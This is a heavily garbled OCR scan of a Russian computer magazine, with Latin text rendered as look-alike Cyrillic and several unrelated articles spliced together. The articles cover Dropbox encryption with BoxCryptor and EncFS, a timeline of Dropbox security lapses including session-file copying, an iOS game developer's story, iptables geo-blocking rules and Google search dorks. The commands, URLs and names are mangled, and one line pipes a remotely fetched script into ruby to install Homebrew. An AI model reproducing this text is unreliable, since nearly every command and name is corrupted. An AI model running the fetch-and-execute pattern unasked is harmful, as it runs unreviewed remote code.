©О д > СотдИГЕг > ВояСгууійгОйІ > | ВшСг^Ійг.., р | 





Файлы: в открытом и зашифрованном виде 

онности, которая реализована в ПгорЬох. Поэтому если такая возмож- 
ность тебе нужна, то шифрование имен файлов придется отключить. 

С этого момента ты должен увидеть директорию ВохСгурІог внутри 
своего ПгорЬох’а, а в системе должен появиться виртуальный диск (у 
меня — X:). Теперь у тебя в ПгорЬох’е есть папка, где ты можешь хра- 
нить конфиденциальные файлы. Тут важно запомнить два важных пра- 
вила. Первое — никогда не сохраняй файлы напрямую в директорию 
ВохСгурІог, это место, где данные хранятся в зашифрованном виде (и в 
таком же виде синхронизируются с облаком). Поэтому работать с доку- 
ментами надо через тот самый виртуальный диск. И второе — никогда 
не удаляй из папки ВохСгурІог файл епсі'зб.хті. В нем находится 
важная для ЕпсЕЗ информация, которая необходима для того, чтобы 
дешифровать данные. В бесплатной версии программы можно соз- 
дать логический раздел, объемом не более двух гигабайт, то есть ровно 
такого же раздела, сколько по умолчанию предоставляет ПгорЬох. На 
случай, если тебя это ограничение не устраивает, и деньги платить не 
хочется, есть открытая реализация ЕпсЕЗ для ѴѴіпсІоѵѵз — епс1'з4ѵѵіп 
[ ді1:огіоиз.огд/епс1'з4ѵѵіп ]. В ней, само собой, никаких ограничений нет. 

В основе, как и в случае с ВохСгурІог, лежит библиотека Покап ( Ьокап- 
сіеѵ.пеі: ]. которая является аналогом ЕП5Е под ѴѴіпсІоѵѵз и необходима 
для монтирования в системе сторонних файловых систем. 

Ііпих 

Во многихдистрибутивах Еіпих все необходимое для использования 
ЕпсЕЗ встроено поумолчанию, но это не всегда упроідаетзадачу. Важно 
использовать самую свежую версию разработки (>= 1 .7), в которой был 
исправлен ряд ошибок. Аво многихдистрибутивах, ксожалению, по- 
ставляется более старый релиз (чаіде всего 1 .6). Это, к примеру, касается 
ПЬипІи 10.10, которая установлена у меня на одном из ноутбуков. Боль- 
шой проблемы здесь нет. Нужнолишьустановить новую версию ЕпсЕЗ и 
для удобства работы с ней еіде ОПІ-утилиту Сгурікеерег: 

зисіо ар1:-§е1: іп5І;а11 епс-Рз сгуріікеерег 

После окончания установки мы можем запустить Сгурікеерег через 
меню «АррІісаЬопз ^ Зузіет Тооіз Сгурікеерег» и импортировать 
зашифрованную директорию: 
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1 . В области уведомлений выбираем «Сгурікеерег ^ Ітрогі; ЕпсРЗ 
Ыбег». 

2 . Далееуказываем директорию, где находятся зашифрованные 
файлы (то есть папку ВохСгурІог’а). 

3 . И определяем желаемую точку монтирования, через которую мы 
сможем обраідаться кданным в открытом виде. 

После этого в меню Сгурікеерег появится пункт для быстрого 
подключения тома ЕпсРЗ: например, «Сгурікеерег > /Ьоте/зіер/ 
Воситепіз/Заі'е». После ввода пароля в системе появится необхо- 
димый нам том с расшифрованными файлами. Можно было обойтись 
и без всяких ОПІ-утилит, просто подключив ЕпсР5-том в консоли: 

епс-р5 ~/ОгорЬох/ВохСгур1;ог/ ~/ВохСгур1;ог 

Первый параметр указывает на расположение зашифрованного 
тома, а второй — на точку монтирования файлов в открытом виде. 

Мае 05 X 

Установка ЕпеРЗ под Мае 05 X, пожалуй, сложнее всего реализуется 
из-за необходимости инсталлировать дополнительные инструменты. 
Но это все равно не займет много времени, а установленные инстру- 
менты все равно еіде не раз пригодятся в работе. Главная загвоздка 
тутвтом, что все распространяемые бинарники ЕпеРЗ для макоси 
безнадежноустарели, поэтому нам придется все с\обирать вручную. 
Порядокдействий здесьтакой: 

1 . Чтобы сразу обзавестись компилятором и другими необходимыми 
инструментами для сборки ЕпеРЗ, лучше всего установить пакет 
разработчика. ХСосІеі сІеѵеІорег.аррІе. сот ). Идеально подойдет бес- 
платная 3-я версия. 

2 . Далее потребуется МасРПЗЕ [ сосіе.доодіе.сот/р/тасі'изе ]. порти- 
рованная под Мае 05 X версия проекта РОЗЕ, который в свою очередь 
использует ЕпеРЗ. Просто запускаем загруженный МасРОЗЕ.ркд, и 
установідик все сделает сам. 

3 . Далее можно было бы установить уже и сам ЕпеРЗ, нотак как 
это пройде всего сделать через менеджер пакетов (а конкретно 
НотеЬгеѵѵ), то придется заинсталлить и его: 

гиЬу -е "$(сиг1 --РбЗІ Іі1;1;р5://гаы.§і1;ІіиЬ.сот/§І5І;/323731)" 




Лог $есге15упс 

4 . Воттеперь мы можем загрузить исходники ЕпеРЗ и собрать иху 
себя на компьютере. НотеЬгеѵѵ сделает все за нас, подгрузив все 
необходимые зависимости (не зря же мы его ставили): 

Ьгеы іп5І:а11 епеРз 

5 . Все — ЕпеРЗ в системе! Можнозайти втерминал и примонтировать 
к системе каталог ВохСгурІог’а (чаиде всего это -/ВгорЬох/ВохСгурІог) 
в ту папку, где будут располагаться файлы в открытом виде (скажем, ~/ 
ВгорЬох/ВохСгурІог): 

епс-р5 ~/0горЬох/ВохСгур1;ог ~/ВохСгур1;ог 

От работы в консоли избавит отличная ООГутилита МасРизіоп 
( уууууу.тас[и510парр.огд ) с подключенным плагином для поддержки 
ЕпеРЗ ( іЬепакесІтап.ѵѵогсІргезз.сот/епсІ'з ). 

Выбираем альтернативу 

ВохСгурІог и ЕпеРЗ, в принципе, не единственная разработка. 
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Доступ к шифрованным 
файлам через веб 



Хроника фейлов ОгорЬох 



При использовании ВохСгурІог ты уже не сможешь просмо- 
треть заидиіденные файлы через веб. Точнее говоря, скачать-то 
их можно, но только в зашифрованном виде. Выручить может 
РогІаЫе-версия ВохСгурІог, которая поможет расшифровать 
загруженные из облака файлы. Правда, если ты не отключил 
шифрование имен файлов, то найти нужные документы может 
быть ой как непросто. Имей это в виду. Вообіде РогІаЫе-версия 
ВохСгурІог предназначена для использования в тех ситуаци- 
ях, когда у пользователя ограничены права в системе. Она, к 
слову, отлично ладит с перемеідаемой сборкой ВгорЬох’а — 
ВгорЬохРогІаЫеАНК ( сІгоррогІаЫе.Ьо.ат ]. 
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Настраиваем ЕпсРБ под Мае 05 X 



предлагаюідая дополнительный слой шифрования поверх ВгорЬох. 
Аналогичный функционал (с шифрованием по АЕ5-256) предлагает 
также ЗесгеіЗупс [ деізесгеізѵпс.сот/зз ]. На официальном сайте 
проекта сейчас доступны версии для ѴѴіпбоѵѵз и Ыпих, а релиз для 
05 X обеідается в самом ближайшем будуідем. Правда, написан 
клиент на ^аѵа, а я при всем своем уважении к этому языку про- 
граммирования, очень не любою реализованные с его помоідью 
десктопные приложения. 

Так что можно сказать, что ВохОгурІог повезло :). Попробуем теперь 
посмотреть на проблему с другой стороны. Раз самсервисневы- 
полняетте обязанности, которые мы от него ожидаем, то может 
быть его просто поменять на что-то другое? Задача, как ни крути, 
не уникальна — есть целый ряд проектов, предлагаюідих синхро- 
низацию файлов между разными компьютерами и устройствами, 
но со значительно большим упором на безопасность данных. 

Один из наиболее нашумевших из них — ѴѴиаІа [ ѵѵѵѵѵѵ.ѵѵиаіа.сопп ]. 
который позиционируется создателями как«безопасное онлайн- 
хранилиіде». Сервис в последнее время агрессивно развивается 
и предлагает практически веете же самые возможности, что естьу 
□ горЬох’а. Уже сейчас доступны клиенты для ѴѴіпбоѵѵз, Ыпих, Мае, а 
также іРЬопе и Апбгоіб. 

Для аутентификации ѴѴиаІа использует стандарт Р5А-2048, а для 
шифрования файлов — АЕ5-128. Безопасностьдобавляетеиде и 
распределенный подход сервиса к хранению ресурсов. Дело в том, 
что в основе сервиса лежиттехнология, снижаюидая затраты сер- 
веров благодаря использованию простаиваюидих ресурсов. Когда в 
хранилииде добавляется новый файл, он шифруется и разбивается 
на большое количество фрагментов. Угадай, где размеидаются эти 
фрагменты? В облаке и... компьютерах других пользователей. Да-да, 



7 апреля — исследователь Дерек Ньютон рассказал в своем 
блоге [ ЬіЕ у/бгорЬох іа\[ ] некоторые подробности об автори- 
зации БгорЬох. Оказалось, всю информацию для аутентифи- 
кации программа хранит в файле сопбд.сІЬ. Он находится в 
%АРРОАТА%\ОгорЬох и представляет собой базу данных ЗОЫіе. 
Ореди многих других полей одно из них — ЬозіДб — наиболее 
интересное. Оно определяется клиентом после первой авто- 
ризации и не меняется со временем. И вот в чем засада. Его 
значение никак не привязано к системе. Окопировав сопбд. 
бЬ на другую машину, злоумышленник легко получает доступ к 
данным чужого аккаунта. Без уведомления пользователя! Более 
того, даже если юзер сменит логин и пароль, тоже ничего не 
изменится — ЬозіДб все равно останется валидным. На данный 
момент идентификатор привязывается к конкретному устройству 
и может быть отозван через веб-интерфейс. 

19 апреля — БгорЬох меняет пользовательское соглашение, 
напрямую заявляя, что при необходимости может расшифровать 
файлы пользователей и предоставить их для следствия по зако- 
нам США. 

26 апреля — на ОіШиЬ’е появляется открытый проект БгорзЫр 
[ дііЬиЬ.сот/бгіѵегбап/б горзЫр ]. позволяюидий быстро полу- 
чить в своем аккаунте любой файл, который есть в облаке 
БгорЬох. Бее, что необходимо, — знать его хэш. С автором 
— Бладимиром ван дер Лааном — тут же связался главный 
технический директор сервиса и вежливо попросил убрать 
исходники. Пользователи программы отреагировали созданием 
многочисленных зеркал проекта на дііЬиЬ и на самом БгорЬох. 

Б течение короткого времени им также пришла просьба пред- 
ставителя БгорЬох о немедленном удалении файлов проекта. 

19 июня — в работу сервиса был запуиден релиз с серьезной 
уязвимостью в системе авторизации. Б результате любой поль- 
зователь мог зайти в чужой аккаунт, не зная пароля. БгорЬох 
оправдывается, что за время, которое ушло на исправления 
уязвимости, вход осуидествляли менее 1% пользователей. 



сервис предлагает юзерам программу «торговли» своими моидностя- 
ми. Бее честно: если пользователь поделится частью своего диска 
с сетью ѴѴиаІа, он получает дополнительное пространство в облаке 
(для этого необходимо, чтобы компьютер был включен не менее 4 
часов в день). 

Таким образом, жесткие диски ѴѴиаІа -юзеров составляют распреде- 
ленную сеть, которая используется сервисом для улучшения скорости 
загрузки файлов, доступности и сокраидения своих расходов. Чтобы 
гарантировать, что данные никогда не будетутеряны, применяются 
алгоритмы коррекции ошибок и серьезная избыточность. На старте 
пользователю бесплатно выделяется 1 Гб, но он может прокачать акка- 
унт за счетреферальной программы, привлекая другихлюдей (также, 
как в БгорЬох’е), а также «продажи» своего дискового пространства. 

По правде говоря, полностью перейти на ѴѴиаІа я пока не решился. 
Есть несколько мелочей, которые пока мешают это сделать. Б моей 
папке БгорЬох есть несколько обидих папок, которые мы активно 
используем с другими сотрудниками для совместной работы над 
документами. Это значит, что перейти на ѴѴиаІа придется всем. 
Приложение для мобильного телефона, хотя и предоставляет 
доступ к файлам в облаке, но пока сильно ограничено в возможно- 
стях. А интерфейс для доступа к файлам через браузер реализован 
через тормозной 8аѵа-апплет. Поэтому связка БгоЬох+БохСгурІог 
— мой выбор на данный момент. Бее работает, все привычно, все 
безопасно — короче говоря, мне нравится. ^ 
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Чуть больше пары лет назад я сидел дома и смотрел в только что 
приобретенный МасВоок Рго. Задача была простая - умудриться 
в короткие сроки портировать на іРНопе свою флеш-игрушку Рад- 
боИ Саппоп. Опыта не было, язык ОЬіес(іѵе-С казался диким и 
неприступным, а система Мае 08 - непривычной. 



Как все начиналось реализовывать все самому, я просто взял готовый движок Ьох2с1), 

Все началось стого, что в 2008 годуя за шесть дней смастерил на графика, написанная шариковой ручкой, и бэкграунд из мятого 

РІазЬ’е игрушку Радбои Саппоп. Весь геймплей крутился вокруг листка тетрадки в клеточку. Но это хулиганство не прошло незаме- 

пушки, которая стреляет маленькими смешными человечками. Это ченным. Высокие оценки игровых порталов, какие-то призовые ме- 

все больше походило на баловство: очень простая физика (чтобы не ста — все говорило отом, что эта сазиаі-игрушка людям нравится. 
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РадсІоІІ Саппоп. Неказистее не придумаешь 



Первая часть принесла мне всего $600, набор уровней 
для нее — еще $600, а вот вторая часть — уже $8000. 
Третья, как продолжение уже оченьуспешной серии, 
оказалась самой прибыльной, и заработанные на ней 
$25 000 окончательно убедили меня в том, что делать 
игры не только чертовски увлекательно, но и матери- 
ально интересно. С Рад б оИ Саппоп я и начал свой путь 
во РІазЬ-индустрию, где позже достиг, как мне кажется, 
хороших результатов. Собственно обо всем этом было 
рассказано в моей статье «Какя стал зарабатывать на 
играх» в номере 09/2010 журнала ][. 

Как крадут идеи 

Позже наступил момент, когда я понял, что пора вы- 
ходить с та кой хорошей игрой на рынок, где живут еще 
большие деньги. АррЗіоге —тот самый магазин, где 
продаются приложения для іРЬопе/іРоб/іРаб. По- 
чему не попробовать? Все оказалось непросто. Язык 
ОЬ]ес1;іѵе-С, на котором в основном разрабатывают- 
ся приложения для іРЬопе/іРаб, давался тяжело. С 
мертвой точки ситуацию помог сдвинуть сосоз2б, один 
из самых известных движков, которые значительно 
облегчают создание игр для і05. Через несколько дней 
экспериментов появилась какая-то работающая по- 
делка. Вдохновение проснулось, первые результаты 
(это всего лишь были падающие на неподвижную балку 
кирпичи) не могли не радовать, и я уже видел, как мои 
маленькие рагдоллы летают по экрану ай -девайса. Но 
донесся до меня слух, что в АррЗіоге появилась игрушка 
РадбоИ Віазіег. Немедленно установив ее на свой 
девайс, я понял, что слегка опоздал со своей игрой. 
Радбоіі Віазіег — это не просто клон, а жесткий рип-офф 
с РадбоИ Сап поп’ а. Ушлые ребята, конечно, прикрути- 
ли пару новых фишек и переделали почти все уровни, 
но жесткое заимствование было налицо. В тот день я 
сильно напился. Завтрашние жалобы в Арріе ничего не 
дали, ушлые негодяи стали запугивать меня адвока- 
тами, встречными исками и прочим. Дух был сломлен. 
Разработку под і05 я основательно забросил, вернув- 
шись к заработку на флеш -играх. 

Какя узнал об издателях 

Спустя год я получил письмо от одного немца, который 
интересовался моими РІазЬ-играми. Суть его пред- 
ложения была такова: я портирую несколько игр на 
айфон, а он, то есть его фирма-издательство РВО- 
Епіегіаіптепі;, продвигает их в АррЗіоге. Как бы между 
прочим он упомянул о РадбоИ Віазіег’е. Оказалось, 
что игра заработала ушлым негодяям за время своего 
существования в эп плове ком магазине больше двух 




Рііузісз ОатеЬох. Первая игра в Арр5!оге 



миллионов долларов (на данный момент вместе со 
второй частью — все три). Что мне оставалось делать 
:)? Закипела разработка. ОЬ)ес1;іѵе-С уже не казался 
сумасшествием, хотя, надо сказать, код все-таки рож- 
дался в муках. Сейчас, иногда просматривая исходники, 
хочется поскорее их закрыть, потому что это тихий ужас 
для любого мало-мальски толкового кодера. Стоило 
мне представить, что в работающий код нужно вставить 
что-то еще, так сразу хотелось бросить все нафиг. Через 
несколько месяцев мы выпустили в АррЗіоге первый 
наш совместный с РОС проект — РЬузісз ОатеЬох. 
Приложение включало в себя две игры: Рад б оИ Саппоп 
и Роіу-Роіу Саппоп (также очень успешная РІазЬ-игра). 

И вотуже через некоторое время я уже трезво оцени- 
вал результаты работы. Нет, это не был «первый блин 
комом». Общий заработокс этого приложения составил 
более ста тысяч долларов, которые поделили мы втроем 
(Арріе по договору забрал 30 процентов, остаток раз- 
дербанили мы с издателем). Это был очень неплохой 
прорыв в смысле доходности, нотутже, какэто обычно 
бывает, захотелось большего. 

Как мы начали большой 
проект 

К этому моменту я понял, что один я не могу сделать 
все, что запланировал. Поэтому со своей прошлой 
работы я утянул двух своих новых сотрудников. Втроем 
веселее, к тому же, можно уже не париться тестиро- 
ванием и изготовлением игровых уровней —за тебя 
это делают другие, а ты наслаждаешься творчеством. 

В активе была готова и очень успешная РІазЬ-игра 
Соѵег Огапде. Что мы сделали? Правильно, решили 
портировать ее под і 05. По сути, это опять же очень 
простецкая игрушка. На уровне сидит апельсин с 
глазами и ртом. Шевелится, подмигивает. На каждом 
уровне игроку предлагается несколько предметов, 
которые можно разместить (сбросить сверху) таким об- 
разом, чтобы апельсин оказался в укрытии. Для чего? 
Для того, чтобы мерзкая тучка, которая вылезет из 
края экрана не смогла добраться до апельсина своими 
ядовитыми каплями-колючками. Детско? Ато! Просто? 
Ну, а то! Сумасшедше? Конечно! Но чем бредовее, тем 
лучше! Добавь сюда премилую анимацию персона- 
жей, зловещий смехтучки (озвучено вашим покорным 
слугой), веселую музыку из «Деревни дураков» — и 
получаем отменную игру. РІазЬ-версии СоѵегОгапде 
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• Блогавтора: 
ѵѵ\л/ѵѵ.)оЬппу-к.ги . 

• Пример разработки 
простейшего прило- 
жения на сосоз2б для 
іРЬопе: 

ЬаЬгаЬаЬг.гц/Ыодз/ 
тасозхбеѵ/1 22383 . 

• Разработка под 
ІРЬопе 05. Курс моло- 
дого бойца: 
ЬаЬгаЬаЬг.гц/Ыодз/ 
тасозхсІеѵ/86597 . 
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Апельсины + Тучки = Соѵег Огапде 




имели большой успех: обідее количество их просмотров на 
данный момент приближается к 1 00 миллионам. Немецкие из- 
датели активно подбадривали: «Давайте портировать на іРЬопе/ 
іРаб — это будет хит!» И мы стали делать хит. ОЬ]'ес1;іѵе-С был 
родным и правильным: если и встречались мелкие непонятности, 
то решались они быстро. А если не быстро, то только оттого, что 
непонятности росли из библиотеки сосо52с1. Но движок разви- 
вается так быстро, что скоро все недочеты испарились. Хит мы 
делали вдохновенно, сразуже сочинили 80 интересных уровней. 
Картинка была очень хороша и всем нравилась. Играть в игру на 
і Раб ’е было одно удовольствие, на айфоне все хотя и было сильно 
мельче (большим пальцам не развернуться), но все все равно 
были в восторге. Правда, в этот момент Арріе выпустила іРЬопе 4 
со своим дисплеем Реііпа, что добавило нам работы. Нов итоге 
игра смотрелась на этом девайсе просто великолепно, всем по- 
нравилось еіде больше. 

Как мы стали Арріе-манами 

К тому времени мы обросли кучей эппловских девайсов. Было два 
айпода (третьей и четвертой серии), три айпада для постоянных 
тестов, два аймака, два нотбука от Арріе, один четвертый айфон, 
айфон Здз и теперьуже старенький айфон Зд. С издателями мы 
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Среда разработки Хсосіе 

работали без каких-либо финансовых вливаний с их стороны: все 
покупалось на свои деньги. И знаешь что? Скажи мне кто-нибудь в 
2008 году, что по офису-квартире будут валяться все эти сумасшед- 
шие в своем количестве девайсы, я бы притворился, что не знаком 
сэтим человеком. Но потраченных денегя, какправило, нежалею. 
Да и как выясняется, чем больше их тратишь, тем больше они к тебе 
липнут. Свобода действий кружила голову, свобода творчества без 
ограничений пьянила. 

Как мы почувствовали успех 

В ноябре 201 о года мы запустили Соѵег Огапде в АррЗіоге в версии 
для іРаб, продавая игру за $1 ,99. Игра разрабатывалась почти три 
месяца, а всего за несколько дней добралась до американского Тор 
25 (того самого желанного топа). Кэтомуже времени русскийтоп 
был полностью покорен. Мы были самой лучшей игрой для айпада 
в России! Через некоторое время вышла и версия для іРЬопе. Ее 
стоимость была установлена в 99 центов. Игра получала сумас- 
шедшие рейтинги. Средний рейтинг по пятибалльной системе 
АппСтора был пять полных звезд! Комментарии писали самые 
разные категории геймеров: родители, которые умилялись оттого, 
как нравится игра детям, молодые парни, которые удивляли игрой 
своих девушек, и взрослые дядьки, которые показывали игру своим 
бизнес- партнерам. Люди были покорены, и мы этому были очень 
рады. 

Конечно, сделав игру, глупо было останавливаться. Купившим 
ее требовалась доза новых уровней. И мы делали новые уровни. 
В один момент мы даже запустили конкурс среди читателей 
моего блога, где разыгрывались призы от Арріе на лучшие 
уровни. Борьба получилась веселой, жесткой и продуктив- 
ной. Сейчас игра насчитывает 200 уровней, а чтобы пройти их 
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Про девайсы 

Чтобы разрабатывать на іРЬопе, хорошо бы обзавестись самим 
іРЬопе. Необязательно сразу, потому что на первых порах можно 
обойтись симулятором. Но надо иметь в виду, что приобрести его 
рано или поздно придется. Можно обойтись и более дешевым 
вариантом — плеерами іРоб ТоисЬ, которые практически не отли- 
чаются от іРЬопе, кроме того, что не имеют 05М-модуля. Помимо 
этого нужен компьютер Мае, причем обязательно на Іпіеі- 
платформе. Штука не из дешевых, но без нее не обойтись. Опять 
же поэкспериментировать можно на хакинтоше (хотя лично я не 
буду его советовать, поскольку настройка и установка отобьет вся- 
кую охоту к изучению и программированию). А можно пойти еіде 
более радикально и запустить Мае 08 X на виртуальной машине 
(читай статью «МасОЗ X + ѴігІиаІВох = любовь», Ыиу/Г[іШс). Но 
в любом случае, на какие бы ухиідрения ты не шел, если хочешь 
заняться разработкой под і05 серьезно, то Мае и іРЬопе/іРасІ 
придется купить. Большинство из вас плюнут и скажут «не-е». И 
зря. На лежачий камень и болячка не сядет. 

Про инструменты разработки 

Для разработки приложений под іРЬопе 05 необходимо скачать 
и установить іРЬопе 50К ( беѵеіорегарріе.сопп/ірбопе ]. Весит 
этот пакет около трех гигабайт и включает в себя ІВЕ (ХОобе), 
компилятор (000), отладчик (ОВВ), набор библиотек и заголов- 
ков, симулятор іРЬопе и некоторые дополнительные утилиты. 
ХОобе не такая привычная ЮЕ, как, скажем, Ѵізиаі Зіибіо, но на 
деле — очень удобная и предлагаюідая много возможностей. 
Примечательно, что средства девелопера Арріе предоставляет 
бесплатно, а платить придется только за подписку разработчи- 
ка (она необходима, если хочешь продавать приложения через 
АррБіоге). Для написания программ под іРЬопе предлагается 
использовать язык 0Ь)ес1;іѵе-С. При этом есть возможность писать 
также на С и на С++, но это скорее опциональный вариант. Не 
беда, в Сети сейчас огромное количество статей для начинаюідих 
и полноценных книг по 0Ь)-С. Что до меня, я вообіде мануалами 
обзавелся, когда уже был работаюідий прототип игры. Причем 
опыту меня весьма небольшой: немного баѵа и АсбопЗсгірІ; 3. А 
прототип появился после изучения примеров движка сосозЗб. 
Последний обладает хорошим комьюнити и большим количеством 
заготовок. Бери пример — и давай его ломать, изменять! А там и 



до прототипа недалеко. Подход, вероятно, не самый удачный, но в 
моем случае сработал. 

Про работу с издателем 

Как только смастеришь прототип игры, где уже будет несколько 
играюідих уровней, можно искать издателя. Заходи в АррЗіоге, 
анализируй успешные игры, гугли название издателя и пиши ему 
письмо. Для чего это нужно? Издатель очень полезен в плане 
советов по игре, доработке ее до готового к продаже продукта. Он 
же может предоставить членство в той самой девелоперской про- 
грамме, подсказать, как выдержать все соответствия игры перед 
требованиями проверяюідей команды Арріе, поделиться хорошей 
системой статистики, через которую очень наглядно отслежи- 
ваются рейтинги (чаіде всего — аррбдигез.сопп ). комментарии 
пользователей и даже заработанные деньги. Ты можешь спро- 
сить: «Зачем, собственно, издатель?» Есть же примеры, когда 
некий малолетний мальчик мастерит игру и она срывает башню 
как Арріе, так и всем средствам массовой информации. Запомни 
раз и навсегда — это не про тебя. Не про меня, ни про кого. 
Единичные случаи успеха — это единичные случаи успеха, 99% 
одиночек умирают в АппСторе. Потому что просто не знают, как 
издаваться, где рекламироваться, как продвигать приложения. 
Издатель знает, и за это он берет деньги. Его вознаграждение 
— это всегда доля выручки. В зависимости от издателя она коле- 
блется от 30 до 50 процентов после вычета тридцатипроцентной 
доли Арріе. Издатель знает, где написать про игру, на какие сайты 
ее забросить в ожидании рецензии, какой форум подключить 
для подпитки интереса. Он знает, какие акции запускать, какие 
инструменты использовать, и каких партнеров мобилизовывать 
для дополнительных промо-акций. Он же и занимается сноше- 
ниями с Арріе, выкладывая в АппОтор игру и обновления, отсле- 
живает письма в техподдержку. Не менее важна легальность 
всего происходяідего. 0 издателем заключается договор, по этому 
договору он переводит тебе деньги, которые очень легко обо- 
сновываются перед государством (чтобы заплатить с них налоги). 
Будь ты ИП, 000 или даже простым физическим лицом — неваж- 
но. Но если ты окажешься смельчаком, посягнувшим на АппОтор 
в одиночку, бюрократия съест тебя еіде на стадии заполнения 
документов. Каждый должен заниматься своим делом. Ты дела- 
ешь продукт, а продавец в лице издателя его продает. 



все, потребуется не меньше трех- четырех часов. Не могло не 
радовать, что дружба с 0Ь)есІіѵе-0 помогла избавить игру от 
вылетов и прочих неприятностей еіде на стадии разработки. 
Если и случались гневные комментарии, то только не по поводу 
вылетов. «Слишком простая игра», «игра для детей», «я прошел 
ее за пять минут», — писали маленькие дети, желаюідие казать- 
ся взрослыми. По какой-то причине приложение не нравилось 
только Арріе. Практически любая мало-мальски хорошая игра, 
стоит ей выйти в АппСторе, получает некое промо от магазина: 
компания помеідает игру в раздел «новые и примечательные», 
а самые хорошие игры удостаиваются больших баннеров на 
главной странице. Мы не получили из этого почти ничего. Ви- 
димо, какие-то проблемы у Яблока с Апельсинами. Но нас это не 
сильно волновало. 

Как мы считали прибыль 

За пол года суідествования игры в АппСторе, Соѵег Огапде зарабо- 
тала больше полумиллиона долларов. И по-прежнему продолжает 
приносить деньги. Издатель постоянно придумывает какие-то 
промо-акции, чтобы поддерживать интерес и постоянно напоми- 



нать о себе. Рождаются и новые фишки. Сейчас мы прикручиваем 
возможность продажи подсказок в самой игре. Застрял на уровне 
так, что ну вообіде не представляешь как его пройти, — нажми 
кнопку, и уровень пройдется сам по себе. Такая опция будет стоить 
$0,99. Возможно и мелочь, но у издателя есть проверенные данные, 
что некоторые игры зарабатывают на таких штуках сотни тысяч 
долларов. Не обходим стороной и новые платформы. Недавно мы 
смастерили версию игры для десктоп ной Мае 05. Хвала сосо52с1 — 
это было предельно просто. Потребовалосьтолько притянуть игру 
не под тач -интерфейс, а под управление мышкой или тачпадом. 
Похвастать тут пока нечем, но работа по продвижению ведется. 
Причем игра продается в еіде совсем новом эппловском изобрете- 
нии — Арр5іоге для Мае 05. 

Что мы делаем сейчас? Продолжаем делать флеш-игры. Казалось 
бы — зачем, если есть более прибыльный рынок? Флеш-платформа 
хороша тем, что игры разрабатываются быстро, их можно обка- 
тать на большой аудитории и собрать пожелания. Удачно пошла 
флеш -вереи я? Значит мы ее портируем. Аэто еіде и по-прежнему 
довольно прибыльное дело. Но основная платформа теперь — это, 
конечно же, і05! пг 
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■ ■ Степан «Зіер» Ильин (іѵѵіИег.сот/зІераЬ) 



КОЛОНКА 

РЕДАКТОРА 

Про то, как блокировать китайцев 

Ѳ Недавно столкнулся с проблемой: на сайт в огромном количестве повалил 
китайский трафик. Оказалось, что одна из размещенных на моем хосте 
картинок попала в китайские блоги. Провайдер, у которого я арендую сервер, 
тут же забил тревогу о несоответствии соотношений (три к двум) российского 
и зарубежного трафиков. 



Переплачивать естественно не хотелось, 
поэтому я быстро выровнял соотношение 
и начал думать, как исправить ситуацию. 
Собственно, выход в своей ситуации я 
видел один — блокировать трафик с китай- 
ских ІР-адресов. По крайней мере, в случае 
возникновения подобной ситуации. Для 
этого нужно было обзавестись актуальной 
геолокационной базой данных ІР-адресов 
для определения китайского трафика и 
выбрать решение, чтобы блокировать под- 
ключения по географическому признаку. 
Геолокационных баз данных ІР-адресов (в 
формате «Город/Страна — ІР») оказалось 
достаточно много, как собранных энтузиа- 
стами, так и профессиональными компа- 
ниями, которые продают их за деньги. Мне 
больше всего приглянулась бесплатная 
ѴѴІР-Вазе от сервиса ѴУІРтапіа.сопп . 
Решение задачи разделим на два пун- 
кта: выбор геолокационной базы данных 
ІР-адресов для определения китайского 
трафика и настройку решения для бло- 
кировки подключений с нежелательных 
ІР-адресов. 

1 . Различными энтузиастами и про- 
фессионалами созданы различные гео- 
локационные базы данных ІР-адресов (в 
формате «Город/Страна — ІР»). Из всех 
предложений, присутствуюідих в интернете, 
мне больше всего нравится бесплатная 
ѴѴІР-Вазе от ѴУІРтапіа.сопп . Она позволя- 
ет неограниченно определять реальные 
физические расположения ІР-адресов. Она 
абсолютно бесплатна для персонального и 
бизнес-использования, постоянно обновля- 
ется, доступна в 501, ОЮР, текстовом фор- 
мате и предоставляет ряд фишек: 

• ѴѴІР-АРІ (удобный АРІ для разработчиков); 
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• ѴѴІР-РІидіп (ѴѴогІсІІР- плагин для Могіііа 
РігеЬх); 

• ѴѴІР-Мар (показывает ІР-адреса прямо на 
карте). 

Опектр применения довольно широк: гео- 
таргетинг в электронной коммерции, борь- 
ба с фродом, фишингом, спамом и мошен- 
ничеством, заідита серверов от различных 
видов атак по геопризнаку. Собственно, 
последнее и есть наша задача. 

2 . Для того чтобы ограничить трафик 
из какой-то определенной страны, есть 
разные решения. Мы же воспользуемся 
стандартной возможностью ірІаЫез, позво- 
ляюідей проводить фильтрацию по гео- 
признаку. Кстати, это может применяться 
не только для блокировки нежелательных 
подключений, но и для балансировки 
запросов на разные бекенды, каждый из 
которых обрабатывает свой регион. Нам 
поможет модуль деоір из пакета расшире- 
ний хІаЫез-асІсІопз для ірІаЫез, у него свой 
формат геолокационной базы, но к счастью 
ѴѴогІсІІР-база от ѴѴІРтапіа теперь есть и в 
этом формате. Порядок действий такой: 

1 . Устанавливаем хІаЫез-асІсІопз ( хІаЫез- 
асІсІопз.зоигсеЬгде.пеІ: ). 

2 . Подключаем базу для модуля деоір. 
Актуальная версия базы всегда доступна по 
СІРС — 5Іабс.ѵѵістапіа.сот/5ІаПс/\А/сгІ.сіір. 
ірІаЫез.Іаг.дг . Чтобы база обновлялась, ее 
можно обновлять по крону (скажем, раз в 
месяц). 

3 . Далее можно настроить правила. 
Блокируем доступ к Ьир-серверу для всех 
клиентов из Китая: 

ір1;аЫе5 -А ІМРІЯ -р 1;ср --сірогі; 80 
-т §еоір --5ГС-СС С1\1 -д ОКОР 



Справка по Китаю от ѴѴІР-Мар 

ір1;аЫе5 -А ІМРІЯ -р 1;ср --сірогі; 80 
-д АССЕРТ 

Можно поступить более радикально и раз- 
решить доступ для клиентов из каких-то 
конкретных стран (например, России, 
Украины и Белоруссии): 

ір1;аЫе5 -А ІМРІІТ -р 1;ср --сірогі; 80 
-т §еоір --5ГС-СС Ри^^^А^ВУ -д АССЕРТ 
ір1;аЫе5 -А INР^Т -р 1;ср --сірогі; 80 
-д ОКОР 

Задачу можно было также решить через 
пдіпх с помоідью модуля пдх_Ы;1;р_део_ 
тосіиіе, настроив несколько простых пра- 
вил (подробнее — Ы1:.[у/]1НТаА ). 
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Когда-то давно мы делились с тобой 



маленькими хаками для поиска различного 
рода файлов через боодіе. К примеру, запрос 
« "іпсіех оГ' + "трЗ " -Ыті -Мт -рНр» позволял 
найти огромное количество директорий с трЗ- 
файлами. Но зто было не самым интересным. 



Главное, что с помощью подобных запросов (сейчас они собраны 
